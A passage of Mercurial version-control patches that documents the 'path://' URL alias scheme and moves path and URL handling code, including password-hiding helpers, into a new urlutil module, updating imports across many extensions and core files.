To push to ``local_path``: -:hg:`push local_path`. +:hg:`push local_path`. You can check :hg:`help urls` for details about +valid URLs. Options containing colons (``:``) denote sub-options that can influence behavior for that specific path. Example:: diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1833,7 +1833,7 @@ These symbolic names can be used from the command line. To pull from "my_server": 'hg pull my_server'. To push to "local_path": 'hg push - local_path'. + local_path'. You can check 'hg help urls' for details about valid URLs. Options containing colons (":") denote sub-options that can influence behavior for that specific path. Example: # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618061432 -7200 # Sat Apr 10 15:30:32 2021 +0200 # Node ID 95a5ed7db9cabe52bcf84599e017ec1bed63a290 # Parent ede52e19c752eeff69d4df8188413b0111a62f04 help: document the `path://` url scheme If we want people to use it, we need to document it. Differential Revision: https://phab.mercurial-scm.org/D10372 diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -1712,6 +1712,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path +Paths using the `path://otherpath` scheme will inherit the sub-options value from +the path they point to. 
+ The following sub-options can be defined: ``pushurl`` diff --git a/mercurial/helptext/urls.txt b/mercurial/helptext/urls.txt --- a/mercurial/helptext/urls.txt +++ b/mercurial/helptext/urls.txt @@ -5,6 +5,7 @@ http://[user[:pass]@]host[:port]/[path][#revision] https://[user[:pass]@]host[:port]/[path][#revision] ssh://[user@]host[:port]/[path][#revision] + path://pathname Paths in the local filesystem can either point to Mercurial repositories or to bundle files (as created by :hg:`bundle` or @@ -64,3 +65,12 @@ default-push: The push command will look for a path named 'default-push', and prefer it over 'default' if both are defined. + +These alias can also be use in the `path://` scheme:: + + [paths] + alias1 = URL1 + alias2 = path://alias1 + ... + +check :hg:`help config.paths` for details about the behavior of such "sub-path". diff --git a/tests/test-help.t b/tests/test-help.t --- a/tests/test-help.t +++ b/tests/test-help.t @@ -1842,6 +1842,9 @@ my_server = https://example.com/my_path my_server:pushurl = ssh://example.com/my_path + Paths using the 'path://otherpath' scheme will inherit the sub-options + value from the path they point to. + The following sub-options can be defined: "pushurl" # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618178075 -7200 # Sun Apr 11 23:54:35 2021 +0200 # Node ID 33524c46a092315ba76da3763f70b532e49bc8cd # Parent 95a5ed7db9cabe52bcf84599e017ec1bed63a290 urlutil: extract `path` related code into a new module They are a lot of code related to url and path handling scattering into various large module. To consolidate the code before doing more change (for defining "multi-path"), we gather it together. Differential Revision: https://phab.mercurial-scm.org/D10373 diff --git a/mercurial/ui.py b/mercurial/ui.py --- a/mercurial/ui.py +++ b/mercurial/ui.py @@ -26,7 +26,6 @@ from .pycompat import ( getattr, open, - setattr, ) from . 
import ( @@ -48,6 +47,7 @@ procutil, resourceutil, stringutil, + urlutil, ) urlreq = util.urlreq @@ -1049,7 +1049,7 @@ @util.propertycache def paths(self): - return paths(self) + return urlutil.paths(self) def getpath(self, *args, **kwargs): """see paths.getpath for details @@ -2180,237 +2180,6 @@ return util._estimatememory() -class paths(dict): - """Represents a collection of paths and their configs. - - Data is initially derived from ui instances and the config files they have - loaded. - """ - - def __init__(self, ui): - dict.__init__(self) - - for name, loc in ui.configitems(b'paths', ignoresub=True): - # No location is the same as not existing. - if not loc: - continue - loc, sub_opts = ui.configsuboptions(b'paths', name) - self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) - - for name, p in sorted(self.items()): - p.chain_path(ui, self) - - def getpath(self, ui, name, default=None): - """Return a ``path`` from a string, falling back to default. - - ``name`` can be a named path or locations. Locations are filesystem - paths or URIs. - - Returns None if ``name`` is not a registered path, a URI, or a local - path to a repo. - """ - # Only fall back to default if no path was requested. - if name is None: - if not default: - default = () - elif not isinstance(default, (tuple, list)): - default = (default,) - for k in default: - try: - return self[k] - except KeyError: - continue - return None - - # Most likely empty string. - # This may need to raise in the future. - if not name: - return None - - try: - return self[name] - except KeyError: - # Try to resolve as a local path or URI. - try: - # we pass the ui instance are warning might need to be issued - return path(ui, None, rawloc=name) - except ValueError: - raise error.RepoError(_(b'repository %s does not exist') % name) - - -_pathsuboptions = {} - - -def pathsuboption(option, attr): - """Decorator used to declare a path sub-option. 
- - Arguments are the sub-option name and the attribute it should set on - ``path`` instances. - - The decorated function will receive as arguments a ``ui`` instance, - ``path`` instance, and the string value of this option from the config. - The function should return the value that will be set on the ``path`` - instance. - - This decorator can be used to perform additional verification of - sub-options and to change the type of sub-options. - """ - - def register(func): - _pathsuboptions[option] = (attr, func) - return func - - return register - - -@pathsuboption(b'pushurl', b'pushloc') -def pushurlpathoption(ui, path, value): - u = util.url(value) - # Actually require a URL. - if not u.scheme: - ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) - return None - - # Don't support the #foo syntax in the push URL to declare branch to - # push. - if u.fragment: - ui.warn( - _( - b'("#fragment" in paths.%s:pushurl not supported; ' - b'ignoring)\n' - ) - % path.name - ) - u.fragment = None - - return bytes(u) - - -@pathsuboption(b'pushrev', b'pushrev') -def pushrevpathoption(ui, path, value): - return value - - -class path(object): - """Represents an individual path and its configuration.""" - - def __init__(self, ui, name, rawloc=None, suboptions=None): - """Construct a path from its config options. - - ``ui`` is the ``ui`` instance the path is coming from. - ``name`` is the symbolic name of the path. - ``rawloc`` is the raw location, as defined in the config. - ``pushloc`` is the raw locations pushes should be made to. - - If ``name`` is not defined, we require that the location be a) a local - filesystem path with a .hg directory or b) a URL. If not, - ``ValueError`` is raised. - """ - if not rawloc: - raise ValueError(b'rawloc must be defined') - - # Locations may define branches via syntax <base>#<branch>. 
- u = util.url(rawloc) - branch = None - if u.fragment: - branch = u.fragment - u.fragment = None - - self.url = u - # the url from the config/command line before dealing with `path://` - self.raw_url = u.copy() - self.branch = branch - - self.name = name - self.rawloc = rawloc - self.loc = b'%s' % u - - self._validate_path() - - _path, sub_opts = ui.configsuboptions(b'paths', b'*') - self._own_sub_opts = {} - if suboptions is not None: - self._own_sub_opts = suboptions.copy() - sub_opts.update(suboptions) - self._all_sub_opts = sub_opts.copy() - - self._apply_suboptions(ui, sub_opts) - - def chain_path(self, ui, paths): - if self.url.scheme == b'path': - assert self.url.path is None - try: - subpath = paths[self.url.host] - except KeyError: - m = _('cannot use `%s`, "%s" is not a known path') - m %= (self.rawloc, self.url.host) - raise error.Abort(m) - if subpath.raw_url.scheme == b'path': - m = _('cannot use `%s`, "%s" is also define as a `path://`') - m %= (self.rawloc, self.url.host) - raise error.Abort(m) - self.url = subpath.url - self.rawloc = subpath.rawloc - self.loc = subpath.loc - if self.branch is None: - self.branch = subpath.branch - else: - base = self.rawloc.rsplit(b'#', 1)[0] - self.rawloc = b'%s#%s' % (base, self.branch) - suboptions = subpath._all_sub_opts.copy() - suboptions.update(self._own_sub_opts) - self._apply_suboptions(ui, suboptions) - - def _validate_path(self): - # When given a raw location but not a symbolic name, validate the - # location is valid. - if ( - not self.name - and not self.url.scheme - and not self._isvalidlocalpath(self.loc) - ): - raise ValueError( - b'location is not a URL or path to a local ' - b'repo: %s' % self.rawloc - ) - - def _apply_suboptions(self, ui, sub_options): - # Now process the sub-options. If a sub-option is registered, its - # attribute will always be present. The value will be None if there - # was no valid sub-option. 
- for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): - if suboption not in sub_options: - setattr(self, attr, None) - continue - - value = func(ui, self, sub_options[suboption]) - setattr(self, attr, value) - - def _isvalidlocalpath(self, path): - """Returns True if the given path is a potentially valid repository. - This is its own function so that extensions can change the definition of - 'valid' in this case (like when pulling from a git repo into a hg - one).""" - try: - return os.path.isdir(os.path.join(path, b'.hg')) - # Python 2 may return TypeError. Python 3, ValueError. - except (TypeError, ValueError): - return False - - @property - def suboptions(self): - """Return sub-options and their values for this path. - - This is intended to be used for presentation purposes. - """ - d = {} - for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): - value = getattr(self, attr) - if value is not None: - d[subopt] = value - return d - - # we instantiate one globally shared progress bar to avoid # competing progress bars when multiple UI objects get created _progresssingleton = None diff --git a/mercurial/utils/urlutil.py b/mercurial/utils/urlutil.py new file mode 100644 --- /dev/null +++ b/mercurial/utils/urlutil.py @@ -0,0 +1,249 @@ +# utils.urlutil - code related to [paths] management +# +# Copyright 2005-2021 Olivia Mackall <olivia@selenic.com> and others +# +# This software may be used and distributed according to the terms of the +# GNU General Public License version 2 or any later version. +import os + +from ..i18n import _ +from ..pycompat import ( + getattr, + setattr, +) +from .. import ( + error, + pycompat, + util, +) + + +class paths(dict): + """Represents a collection of paths and their configs. + + Data is initially derived from ui instances and the config files they have + loaded. 
+ """ + + def __init__(self, ui): + dict.__init__(self) + + for name, loc in ui.configitems(b'paths', ignoresub=True): + # No location is the same as not existing. + if not loc: + continue + loc, sub_opts = ui.configsuboptions(b'paths', name) + self[name] = path(ui, name, rawloc=loc, suboptions=sub_opts) + + for name, p in sorted(self.items()): + p.chain_path(ui, self) + + def getpath(self, ui, name, default=None): + """Return a ``path`` from a string, falling back to default. + + ``name`` can be a named path or locations. Locations are filesystem + paths or URIs. + + Returns None if ``name`` is not a registered path, a URI, or a local + path to a repo. + """ + # Only fall back to default if no path was requested. + if name is None: + if not default: + default = () + elif not isinstance(default, (tuple, list)): + default = (default,) + for k in default: + try: + return self[k] + except KeyError: + continue + return None + + # Most likely empty string. + # This may need to raise in the future. + if not name: + return None + + try: + return self[name] + except KeyError: + # Try to resolve as a local path or URI. + try: + # we pass the ui instance are warning might need to be issued + return path(ui, None, rawloc=name) + except ValueError: + raise error.RepoError(_(b'repository %s does not exist') % name) + + +_pathsuboptions = {} + + +def pathsuboption(option, attr): + """Decorator used to declare a path sub-option. + + Arguments are the sub-option name and the attribute it should set on + ``path`` instances. + + The decorated function will receive as arguments a ``ui`` instance, + ``path`` instance, and the string value of this option from the config. + The function should return the value that will be set on the ``path`` + instance. + + This decorator can be used to perform additional verification of + sub-options and to change the type of sub-options. 
+ """ + + def register(func): + _pathsuboptions[option] = (attr, func) + return func + + return register + + +@pathsuboption(b'pushurl', b'pushloc') +def pushurlpathoption(ui, path, value): + u = util.url(value) + # Actually require a URL. + if not u.scheme: + ui.warn(_(b'(paths.%s:pushurl not a URL; ignoring)\n') % path.name) + return None + + # Don't support the #foo syntax in the push URL to declare branch to + # push. + if u.fragment: + ui.warn( + _( + b'("#fragment" in paths.%s:pushurl not supported; ' + b'ignoring)\n' + ) + % path.name + ) + u.fragment = None + + return bytes(u) + + +@pathsuboption(b'pushrev', b'pushrev') +def pushrevpathoption(ui, path, value): + return value + + +class path(object): + """Represents an individual path and its configuration.""" + + def __init__(self, ui, name, rawloc=None, suboptions=None): + """Construct a path from its config options. + + ``ui`` is the ``ui`` instance the path is coming from. + ``name`` is the symbolic name of the path. + ``rawloc`` is the raw location, as defined in the config. + ``pushloc`` is the raw locations pushes should be made to. + + If ``name`` is not defined, we require that the location be a) a local + filesystem path with a .hg directory or b) a URL. If not, + ``ValueError`` is raised. + """ + if not rawloc: + raise ValueError(b'rawloc must be defined') + + # Locations may define branches via syntax <base>#<branch>. 
+ u = util.url(rawloc) + branch = None + if u.fragment: + branch = u.fragment + u.fragment = None + + self.url = u + # the url from the config/command line before dealing with `path://` + self.raw_url = u.copy() + self.branch = branch + + self.name = name + self.rawloc = rawloc + self.loc = b'%s' % u + + self._validate_path() + + _path, sub_opts = ui.configsuboptions(b'paths', b'*') + self._own_sub_opts = {} + if suboptions is not None: + self._own_sub_opts = suboptions.copy() + sub_opts.update(suboptions) + self._all_sub_opts = sub_opts.copy() + + self._apply_suboptions(ui, sub_opts) + + def chain_path(self, ui, paths): + if self.url.scheme == b'path': + assert self.url.path is None + try: + subpath = paths[self.url.host] + except KeyError: + m = _('cannot use `%s`, "%s" is not a known path') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + if subpath.raw_url.scheme == b'path': + m = _('cannot use `%s`, "%s" is also define as a `path://`') + m %= (self.rawloc, self.url.host) + raise error.Abort(m) + self.url = subpath.url + self.rawloc = subpath.rawloc + self.loc = subpath.loc + if self.branch is None: + self.branch = subpath.branch + else: + base = self.rawloc.rsplit(b'#', 1)[0] + self.rawloc = b'%s#%s' % (base, self.branch) + suboptions = subpath._all_sub_opts.copy() + suboptions.update(self._own_sub_opts) + self._apply_suboptions(ui, suboptions) + + def _validate_path(self): + # When given a raw location but not a symbolic name, validate the + # location is valid. + if ( + not self.name + and not self.url.scheme + and not self._isvalidlocalpath(self.loc) + ): + raise ValueError( + b'location is not a URL or path to a local ' + b'repo: %s' % self.rawloc + ) + + def _apply_suboptions(self, ui, sub_options): + # Now process the sub-options. If a sub-option is registered, its + # attribute will always be present. The value will be None if there + # was no valid sub-option. 
+ for suboption, (attr, func) in pycompat.iteritems(_pathsuboptions): + if suboption not in sub_options: + setattr(self, attr, None) + continue + + value = func(ui, self, sub_options[suboption]) + setattr(self, attr, value) + + def _isvalidlocalpath(self, path): + """Returns True if the given path is a potentially valid repository. + This is its own function so that extensions can change the definition of + 'valid' in this case (like when pulling from a git repo into a hg + one).""" + try: + return os.path.isdir(os.path.join(path, b'.hg')) + # Python 2 may return TypeError. Python 3, ValueError. + except (TypeError, ValueError): + return False + + @property + def suboptions(self): + """Return sub-options and their values for this path. + + This is intended to be used for presentation purposes. + """ + d = {} + for subopt, (attr, _func) in pycompat.iteritems(_pathsuboptions): + value = getattr(self, attr) + if value is not None: + d[subopt] = value + return d # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1618189264 -7200 # Mon Apr 12 03:01:04 2021 +0200 # Node ID ffd3e823a7e543d20c00799a71a75f820e4702d8 # Parent 33524c46a092315ba76da3763f70b532e49bc8cd urlutil: extract `url` related code from `util` into the new module The new module is well fitting for this new code. And this will be useful to make the gathered code collaborate more later. 
Differential Revision: https://phab.mercurial-scm.org/D10374 diff --git a/hgext/fetch.py b/hgext/fetch.py --- a/hgext/fetch.py +++ b/hgext/fetch.py @@ -19,9 +19,11 @@ lock, pycompat, registrar, - util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) release = lock.release cmdtable = {} @@ -109,7 +111,8 @@ other = hg.peer(repo, opts, ui.expandpath(source)) ui.status( - _(b'pulling from %s\n') % util.hidepassword(ui.expandpath(source)) + _(b'pulling from %s\n') + % urlutil.hidepassword(ui.expandpath(source)) ) revs = None if opts[b'rev']: @@ -180,7 +183,7 @@ if not err: # we don't translate commit messages message = cmdutil.logmessage(ui, opts) or ( - b'Automated merge with %s' % util.removeauth(other.url()) + b'Automated merge with %s' % urlutil.removeauth(other.url()) ) editopt = opts.get(b'edit') or opts.get(b'force_editor') editor = cmdutil.getcommiteditor(edit=editopt, editform=b'fetch') diff --git a/hgext/histedit.py b/hgext/histedit.py --- a/hgext/histedit.py +++ b/hgext/histedit.py @@ -242,6 +242,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) pickle = util.pickle @@ -1042,7 +1043,7 @@ opts = {} dest = ui.expandpath(remote or b'default-push', remote or b'default') dest, branches = hg.parseurl(dest, None)[:2] - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs(repo, repo, branches, None) other = hg.peer(repo, opts, dest) diff --git a/hgext/largefiles/basestore.py b/hgext/largefiles/basestore.py --- a/hgext/largefiles/basestore.py +++ b/hgext/largefiles/basestore.py @@ -12,6 +12,9 @@ from mercurial.i18n import _ from mercurial import node, util +from mercurial.utils import ( + urlutil, +) from . 
import lfutil @@ -29,13 +32,13 @@ def longmessage(self): return _(b"error getting id %s from url %s for file %s: %s\n") % ( self.hash, - util.hidepassword(self.url), + urlutil.hidepassword(self.url), self.filename, self.detail, ) def __str__(self): - return b"%s: %s" % (util.hidepassword(self.url), self.detail) + return b"%s: %s" % (urlutil.hidepassword(self.url), self.detail) class basestore(object): @@ -79,7 +82,7 @@ if not available.get(hash): ui.warn( _(b'%s: largefile %s not available from %s\n') - % (filename, hash, util.hidepassword(self.url)) + % (filename, hash, urlutil.hidepassword(self.url)) ) missing.append(filename) continue diff --git a/hgext/largefiles/remotestore.py b/hgext/largefiles/remotestore.py --- a/hgext/largefiles/remotestore.py +++ b/hgext/largefiles/remotestore.py @@ -15,7 +15,10 @@ util, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from . import ( basestore, @@ -40,11 +43,11 @@ if self.sendfile(source, hash): raise error.Abort( _(b'remotestore: could not put %s to remote store %s') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) self.ui.debug( _(b'remotestore: put %s to remote store %s\n') - % (source, util.hidepassword(self.url)) + % (source, urlutil.hidepassword(self.url)) ) def exists(self, hashes): @@ -80,7 +83,7 @@ # keep trying with the other files... they will probably # all fail too. raise error.Abort( - b'%s: %s' % (util.hidepassword(self.url), e.reason) + b'%s: %s' % (urlutil.hidepassword(self.url), e.reason) ) except IOError as e: raise basestore.StoreError( diff --git a/hgext/largefiles/storefactory.py b/hgext/largefiles/storefactory.py --- a/hgext/largefiles/storefactory.py +++ b/hgext/largefiles/storefactory.py @@ -12,6 +12,9 @@ hg, util, ) +from mercurial.utils import ( + urlutil, +) from . 
import ( lfutil, @@ -71,7 +74,7 @@ raise error.Abort( _(b'%s does not appear to be a largefile store') - % util.hidepassword(path) + % urlutil.hidepassword(path) ) diff --git a/hgext/lfs/blobstore.py b/hgext/lfs/blobstore.py --- a/hgext/lfs/blobstore.py +++ b/hgext/lfs/blobstore.py @@ -31,7 +31,10 @@ worker, ) -from mercurial.utils import stringutil +from mercurial.utils import ( + stringutil, + urlutil, +) from ..largefiles import lfutil @@ -725,7 +728,7 @@ https://github.com/git-lfs/git-lfs/blob/master/docs/api/server-discovery.md """ lfsurl = repo.ui.config(b'lfs', b'url') - url = util.url(lfsurl or b'') + url = urlutil.url(lfsurl or b'') if lfsurl is None: if remote: path = remote @@ -739,7 +742,7 @@ # and fall back to inferring from 'paths.remote' if unspecified. path = repo.ui.config(b'paths', b'default') or b'' - defaulturl = util.url(path) + defaulturl = urlutil.url(path) # TODO: support local paths as well. # TODO: consider the ssh -> https transformation that git applies @@ -748,7 +751,7 @@ defaulturl.path += b'/' defaulturl.path = (defaulturl.path or b'') + b'.git/info/lfs' - url = util.url(bytes(defaulturl)) + url = urlutil.url(bytes(defaulturl)) repo.ui.note(_(b'lfs: assuming remote store: %s\n') % url) scheme = url.scheme diff --git a/hgext/mq.py b/hgext/mq.py --- a/hgext/mq.py +++ b/hgext/mq.py @@ -108,6 +108,7 @@ from mercurial.utils import ( dateutil, stringutil, + urlutil, ) release = lockmod.release @@ -2509,7 +2510,7 @@ ) filename = normname(filename) self.checkreservedname(filename) - if util.url(filename).islocal(): + if urlutil.url(filename).islocal(): originpath = self.join(filename) if not os.path.isfile(originpath): raise error.Abort( diff --git a/hgext/narrow/narrowcommands.py b/hgext/narrow/narrowcommands.py --- a/hgext/narrow/narrowcommands.py +++ b/hgext/narrow/narrowcommands.py @@ -36,6 +36,9 @@ util, wireprototypes, ) +from mercurial.utils import ( + urlutil, +) table = {} command = registrar.command(table) @@ -592,7 +595,7 @@ # also 
define the set of revisions to update for widening. remotepath = ui.expandpath(remotepath or b'default') url, branches = hg.parseurl(remotepath) - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) remote = hg.peer(repo, opts, url) try: diff --git a/hgext/patchbomb.py b/hgext/patchbomb.py --- a/hgext/patchbomb.py +++ b/hgext/patchbomb.py @@ -99,7 +99,10 @@ templater, util, ) -from mercurial.utils import dateutil +from mercurial.utils import ( + dateutil, + urlutil, +) stringio = util.stringio @@ -529,7 +532,7 @@ ui = repo.ui url = ui.expandpath(dest or b'default-push', dest or b'default') url = hg.parseurl(url)[0] - ui.status(_(b'comparing with %s\n') % util.hidepassword(url)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(url)) revs = [r for r in revs if r >= 0] if not revs: diff --git a/hgext/phabricator.py b/hgext/phabricator.py --- a/hgext/phabricator.py +++ b/hgext/phabricator.py @@ -103,6 +103,7 @@ from mercurial.utils import ( procutil, stringutil, + urlutil, ) from . import show @@ -366,7 +367,7 @@ process(k, v) process(b'', params) - return util.urlreq.urlencode(flatparams) + return urlutil.urlreq.urlencode(flatparams) def readurltoken(ui): @@ -381,7 +382,7 @@ _(b'config %s.%s is required') % (b'phabricator', b'url') ) - res = httpconnectionmod.readauthforuri(ui, url, util.url(url).user) + res = httpconnectionmod.readauthforuri(ui, url, urlutil.url(url).user) token = None if res: diff --git a/hgext/schemes.py b/hgext/schemes.py --- a/hgext/schemes.py +++ b/hgext/schemes.py @@ -52,7 +52,9 @@ pycompat, registrar, templater, - util, +) +from mercurial.utils import ( + urlutil, ) cmdtable = {} @@ -86,7 +88,7 @@ ) def resolve(self, url): - # Should this use the util.url class, or is manual parsing better? + # Should this use the urlutil.url class, or is manual parsing better? 
try: url = url.split(b'://', 1)[1] except IndexError: @@ -137,7 +139,7 @@ ) hg.schemes[scheme] = ShortRepository(url, scheme, t) - extensions.wrapfunction(util, b'hasdriveletter', hasdriveletter) + extensions.wrapfunction(urlutil, b'hasdriveletter', hasdriveletter) @command(b'debugexpandscheme', norepo=True) diff --git a/mercurial/bookmarks.py b/mercurial/bookmarks.py --- a/mercurial/bookmarks.py +++ b/mercurial/bookmarks.py @@ -27,6 +27,9 @@ txnutil, util, ) +from .utils import ( + urlutil, +) # label constants # until 3.5, bookmarks.current was the advertised name, not @@ -597,10 +600,10 @@ # try to use an @pathalias suffix # if an @pathalias already exists, we overwrite (update) it if path.startswith(b"file:"): - path = util.url(path).path + path = urlutil.url(path).path for p, u in ui.configitems(b"paths"): if u.startswith(b"file:"): - u = util.url(u).path + u = urlutil.url(u).path if path == u: return b'%s@%s' % (b, p) diff --git a/mercurial/bundle2.py b/mercurial/bundle2.py --- a/mercurial/bundle2.py +++ b/mercurial/bundle2.py @@ -177,7 +177,10 @@ url, util, ) -from .utils import stringutil +from .utils import ( + stringutil, + urlutil, +) urlerr = util.urlerr urlreq = util.urlreq @@ -2073,7 +2076,7 @@ raw_url = inpart.params[b'url'] except KeyError: raise error.Abort(_(b'remote-changegroup: missing "%s" param') % b'url') - parsed_url = util.url(raw_url) + parsed_url = urlutil.url(raw_url) if parsed_url.scheme not in capabilities[b'remote-changegroup']: raise error.Abort( _(b'remote-changegroup does not support %s urls') @@ -2110,7 +2113,7 @@ cg = exchange.readbundle(op.repo.ui, real_part, raw_url) if not isinstance(cg, changegroup.cg1unpacker): raise error.Abort( - _(b'%s: not a bundle version 1.0') % util.hidepassword(raw_url) + _(b'%s: not a bundle version 1.0') % urlutil.hidepassword(raw_url) ) ret = _processchangegroup(op, cg, tr, op.source, b'bundle2') if op.reply is not None: @@ -2126,7 +2129,7 @@ except error.Abort as e: raise error.Abort( _(b'bundle 
at %s is corrupted:\n%s') - % (util.hidepassword(raw_url), e.message) + % (urlutil.hidepassword(raw_url), e.message) ) assert not inpart.read() diff --git a/mercurial/bundlerepo.py b/mercurial/bundlerepo.py --- a/mercurial/bundlerepo.py +++ b/mercurial/bundlerepo.py @@ -43,6 +43,9 @@ util, vfs as vfsmod, ) +from .utils import ( + urlutil, +) class bundlerevlog(revlog.revlog): @@ -475,7 +478,7 @@ cwd = pathutil.normasprefix(cwd) if parentpath.startswith(cwd): parentpath = parentpath[len(cwd) :] - u = util.url(path) + u = urlutil.url(path) path = u.localpath() if u.scheme == b'bundle': s = path.split(b"+", 1) diff --git a/mercurial/commands.py b/mercurial/commands.py --- a/mercurial/commands.py +++ b/mercurial/commands.py @@ -74,6 +74,7 @@ from .utils import ( dateutil, stringutil, + urlutil, ) if pycompat.TYPE_CHECKING: @@ -4319,7 +4320,7 @@ ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 ui.pager(b'incoming') - ui.status(_(b'comparing with %s\n') % util.hidepassword(source)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(source)) return bookmarks.incoming(ui, repo, other) finally: other.close() @@ -4994,7 +4995,7 @@ if b'bookmarks' not in other.listkeys(b'namespaces'): ui.warn(_(b"remote doesn't support bookmarks\n")) return 0 - ui.status(_(b'comparing with %s\n') % util.hidepassword(dest)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(dest)) ui.pager(b'outgoing') return bookmarks.outgoing(ui, repo, other) finally: @@ -5142,7 +5143,7 @@ fm = ui.formatter(b'paths', opts) if fm.isplain(): - hidepassword = util.hidepassword + hidepassword = urlutil.hidepassword else: hidepassword = bytes if ui.quiet: @@ -5392,7 +5393,7 @@ source, branches = hg.parseurl( ui.expandpath(source), opts.get(b'branch') ) - ui.status(_(b'pulling from %s\n') % util.hidepassword(source)) + ui.status(_(b'pulling from %s\n') % urlutil.hidepassword(source)) ui.flush() other = hg.peer(repo, opts, source) update_conflict = None @@ -5732,7 +5733,7 @@ ) dest = 
path.pushloc or path.loc branches = (path.branch, opts.get(b'branch') or []) - ui.status(_(b'pushing to %s\n') % util.hidepassword(dest)) + ui.status(_(b'pushing to %s\n') % urlutil.hidepassword(dest)) revs, checkout = hg.addbranchrevs( repo, repo, branches, opts.get(b'rev') ) @@ -7235,7 +7236,7 @@ revs, checkout = hg.addbranchrevs(repo, other, branches, None) if revs: revs = [other.lookup(rev) for rev in revs] - ui.debug(b'comparing with %s\n' % util.hidepassword(source)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(source)) repo.ui.pushbuffer() commoninc = discovery.findcommonincoming(repo, other, heads=revs) repo.ui.popbuffer() @@ -7257,7 +7258,7 @@ if opts.get(b'remote'): raise return dest, dbranch, None, None - ui.debug(b'comparing with %s\n' % util.hidepassword(dest)) + ui.debug(b'comparing with %s\n' % urlutil.hidepassword(dest)) elif sother is None: # there is no explicit destination peer, but source one is invalid return dest, dbranch, None, None @@ -7599,7 +7600,7 @@ try: txnname = b'unbundle' if not isinstance(gen, bundle2.unbundle20): - txnname = b'unbundle\n%s' % util.hidepassword(url) + txnname = b'unbundle\n%s' % urlutil.hidepassword(url) with repo.transaction(txnname) as tr: op = bundle2.applybundle( repo, gen, tr, source=b'unbundle', url=url diff --git a/mercurial/debugcommands.py b/mercurial/debugcommands.py --- a/mercurial/debugcommands.py +++ b/mercurial/debugcommands.py @@ -98,6 +98,7 @@ dateutil, procutil, stringutil, + urlutil, ) from .revlogutils import ( @@ -1061,7 +1062,7 @@ remoteurl, branches = hg.parseurl(ui.expandpath(remoteurl)) remote = hg.peer(repo, opts, remoteurl) - ui.status(_(b'comparing with %s\n') % util.hidepassword(remoteurl)) + ui.status(_(b'comparing with %s\n') % urlutil.hidepassword(remoteurl)) else: branches = (None, []) remote_filtered_revs = scmutil.revrange( @@ -3652,7 +3653,7 @@ source = b"default" source, branches = hg.parseurl(ui.expandpath(source)) - url = util.url(source) + url = urlutil.url(source) 
defaultport = {b'https': 443, b'ssh': 22} if url.scheme in defaultport: @@ -4525,7 +4526,7 @@ # We bypass hg.peer() so we can proxy the sockets. # TODO consider not doing this because we skip # ``hg.wirepeersetupfuncs`` and potentially other useful functionality. - u = util.url(path) + u = urlutil.url(path) if u.scheme != b'http': raise error.Abort(_(b'only http:// paths are currently supported')) diff --git a/mercurial/exchange.py b/mercurial/exchange.py --- a/mercurial/exchange.py +++ b/mercurial/exchange.py @@ -42,6 +42,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) urlerr = util.urlerr @@ -1465,7 +1466,7 @@ def transaction(self): """Return an open transaction object, constructing if necessary""" if not self._tr: - trname = b'%s\n%s' % (self.source, util.hidepassword(self.url)) + trname = b'%s\n%s' % (self.source, urlutil.hidepassword(self.url)) self._tr = self.repo.transaction(trname) self._tr.hookargs[b'source'] = self.source self._tr.hookargs[b'url'] = self.url @@ -2647,7 +2648,7 @@ # push can proceed if not isinstance(cg, bundle2.unbundle20): # legacy case: bundle1 (changegroup 01) - txnname = b"\n".join([source, util.hidepassword(url)]) + txnname = b"\n".join([source, urlutil.hidepassword(url)]) with repo.lock(), repo.transaction(txnname) as tr: op = bundle2.applybundle(repo, cg, tr, source, url) r = bundle2.combinechangegroupresults(op) diff --git a/mercurial/hg.py b/mercurial/hg.py --- a/mercurial/hg.py +++ b/mercurial/hg.py @@ -55,6 +55,7 @@ from .utils import ( hashutil, stringutil, + urlutil, ) @@ -65,7 +66,7 @@ def _local(path): - path = util.expandpath(util.urllocalpath(path)) + path = util.expandpath(urlutil.urllocalpath(path)) try: # we use os.stat() directly here instead of os.path.isfile() @@ -132,7 +133,7 @@ def parseurl(path, branches=None): '''parse url#branch, returning (url, (branch, branches))''' - u = util.url(path) + u = urlutil.url(path) branch = None if u.fragment: branch = u.fragment @@ -152,7 +153,7 @@ def 
